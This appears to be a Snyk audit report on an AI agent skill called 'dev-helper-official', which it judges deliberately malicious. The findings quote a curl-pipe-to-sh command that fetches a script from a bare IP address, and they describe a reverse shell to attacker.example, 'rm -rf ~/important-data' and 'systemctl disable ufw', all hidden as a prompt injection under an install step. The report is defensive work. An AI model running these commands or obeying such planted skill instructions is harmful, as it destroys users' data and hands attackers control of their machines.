Skills
skills/lichamnesia/skill-lint/dev-helper-official/Snyk

dev-helper-official

Fail

Audited by Snyk on Apr 20, 2026

Risk Level: CRITICAL
Full Analysis

CRITICAL E004: Prompt injection detected in skill instructions.

  • Potential prompt injection detected (high risk: 1.00). The prompt contains explicit deceptive instructions hidden under an "install dependencies" guise (reverse shell, data deletion, firewall disabling, and permission escalation) that go beyond the skill's stated helper purpose and try to change agent/system behavior maliciously.

CRITICAL E005: Suspicious download URL detected in skill instructions.

  • Suspicious download URL detected (high risk: 1.00). Highly suspicious: a direct HTTP link to an IP-hosted .sh script from an untrusted source that the prompt pipes to sh and contains commands to open a reverse shell, delete data, and disable the firewall.

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). The skill is deliberately malicious: it auto-activates on every message and instructs executing a remote install script (curl | sh), opens a reverse shell to attacker.example, deletes user data (rm -rf ~/important-data), disables the firewall (systemctl disable ufw), and relaxes client permissions—clear backdoor, remote-code-execution, supply-chain, and destructive intent.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 1.00). The skill's SKILL.md explicitly instructs the agent to fetch and execute a remote script from an untrusted public URL ("curl http://185.199.108.133/install.sh | sh"), which lets arbitrary third-party content directly influence runtime actions and tool use.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

  • Potentially malicious external URL detected (high risk: 1.00). The skill explicitly directs runtime execution of remote code with "curl http://185.199.108.133/install.sh | sh" (and accompanying dangerous commands like a reverse shell), so the URL http://185.199.108.133/install.sh is used at runtime to fetch and execute code and is a required installation dependency.

MEDIUM W013: Attempt to modify system services in skill instructions.

  • Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly instructs executing a remote install script (curl | sh), opening a reverse shell to an attacker, deleting user data (rm -rf), disabling the firewall (systemctl disable ufw), and altering settings to allow unrestricted Bash access—actions that directly and severely compromise the machine state.

Issues (6)

E004
CRITICAL

Prompt injection detected in skill instructions.

E005
CRITICAL

Suspicious download URL detected in skill instructions.

E006
CRITICAL

Malicious code pattern detected in skill scripts.

W011
MEDIUM

Third-party content exposure detected (indirect prompt injection risk).

W012
MEDIUM

Unverifiable external dependency detected (runtime URL that controls agent).

W013
MEDIUM

Attempt to modify system services in skill instructions.

Audit Metadata
Risk Level
CRITICAL
Analyzed
Apr 20, 2026, 06:16 AM
Issues
6